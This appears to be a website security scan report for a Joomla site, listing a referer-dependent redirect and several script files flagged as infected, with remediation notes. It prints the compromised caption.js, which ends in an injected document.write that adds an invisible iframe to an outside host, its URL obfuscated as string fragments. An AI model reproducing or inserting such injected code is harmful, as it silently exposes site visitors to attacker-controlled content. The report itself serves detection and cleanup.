Malicious/Suspicious Redirects
Request | Server response | Status |
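URL: http://pechorybuss.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pechorybuss.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 20 Jul 2014 11:03:12 GMT Location: http://tinyurl.com/c2td3xs Server: nginx Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
The 302 was returned to a request that carried a search-engine Referer, while the same URL returned 200 OK in the page scan below. The redirect therefore appears to depend on how the visitor arrives, and may not be seen when the site is opened directly. The web server's rewrite configuration and the site's PHP entry scripts are the places to inspect for the condition. The X-Powered-By header reports PHP/5.2.17, a release line that no longer receives security fixes.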
Scanned pages/files
Request | Server response | Status |
http://pechorybuss.ru/ | 200 OK Content-Length: 13541 Content-Type: text/html | clean |
http://pechorybuss.ru/media/system/js/caption.js | 200 OK Content-Length: 2161 Content-Type: application/x-javascript | malicious |
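Malicious code - confirmed by antiviruses (see below):
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://'+'zoz'+'ko'+'n'+'op'+'is'+'ka.pl/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
In this excerpt the JCaption code is followed by one added statement: a document.write call that inserts an iframe with width="0" and height="0", so it is not visible to the visitor. Its address is assembled from short string fragments, so the full URL does not appear as one string in the file. Deleting that statement removes the symptom only; how the file came to be modified still has to be established, and the other script files flagged in this report should be checked for the same addition.
Antivirus reports: (none are listed in this copy of the report)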
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=53 | 200 OK Content-Length: 22387 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=section&id=6&Itemid=54 | 200 OK Content-Length: 9528 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=55 | 200 OK Content-Length: 34831 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=56 | 200 OK Content-Length: 7935 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=57 | 200 OK Content-Length: 10657 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=58 | 200 OK Content-Length: 300639 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=59 | 200 OK Content-Length: 7830 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=60 | 200 OK Content-Length: 10202 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=65 | 200 OK Content-Length: 13492 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_ckforms&view=ckforms&id=1&Itemid=66 | 200 OK Content-Length: 9880 Content-Type: text/html | clean |
http://pechorybuss.ru/components/com_ckforms/js/jquery-1.3.2.min.js | 200 OK Content-Length: 67006 Content-Type: application/x-javascript | malicious |
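Malicious code - confirmed by antiviruses (see below). The excerpt is cut off and shows only the opening of the minified jQuery library; the code that triggered the detection is not visible in it. In caption.js above the added statement sits at the end of the file, so the end of this file is the first place to compare against a known-good copy of jquery-1.3.2.min.js.
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
[excerpt truncated]
Antivirus reports: (none are listed in this copy of the report)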
http://pechorybuss.ru/components/com_ckforms/js/jquery.tooltip.min.js | 200 OK Content-Length: 15053 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is cut off and shows only the opening of the tooltip plugin; the code that triggered the detection is not visible in it.
;(function($){var helper={},current,title,tID,IE=$.browser.msie&&/MSIE\s(5\.5|6\.)/.test(navigator.userAgent),track=false;$.tooltip={blocked:false,defaults:{delay:200,fade:false,showURL:true,extraClass:"",top:15,left:15,id:"tooltip"},block:function(){$.tooltip.blocked=!$.tooltip.blocked;}};$.fn.extend({tooltip:function(settings){settings=$.extend({},$.tooltip.defaults,settings);createHelper(settings);return this.each(function(){$.data(this,"tooltip",settings);this.tOpacity=helper.parent.
[excerpt truncated]
Antivirus reports: (none are listed in this copy of the report)
http://pechorybuss.ru/components/com_ckforms/js/ui.datepicker.packed.js | 200 OK Content-Length: 54716 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is cut off and shows only the opening of the datepicker script; the code that triggered the detection is not visible in it.
(function($){$.extend($.ui,{datepicker:{version:"1.7.2"}});var PROP_NAME="datepicker";function Datepicker(){this.debug=false;this._curInst=null;this._keyEvent=false;this._disabledInputs=[];this._datepickerShowing=false;this._inDialog=false;this._mainDivId="ui-datepicker-div";this._inlineClass="ui-datepicker-inline";this._appendClass="ui-datepicker-append";this._triggerClass="ui-datepicker-trigger";this._dialogClass="ui-datepicker-dialog";this._disableClass="ui-datepicker-disabled";this._unselect
[excerpt truncated]
Antivirus reports: (none are listed in this copy of the report)
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pechorybuss.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pechorybuss.ru/
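Result: pechorybuss.ru is not infected or malware details are not published yet.
These blacklist results reflect the listings at the time of the query. A site can be absent from them while still serving the redirect and the modified script files reported above, so they do not override the scan findings.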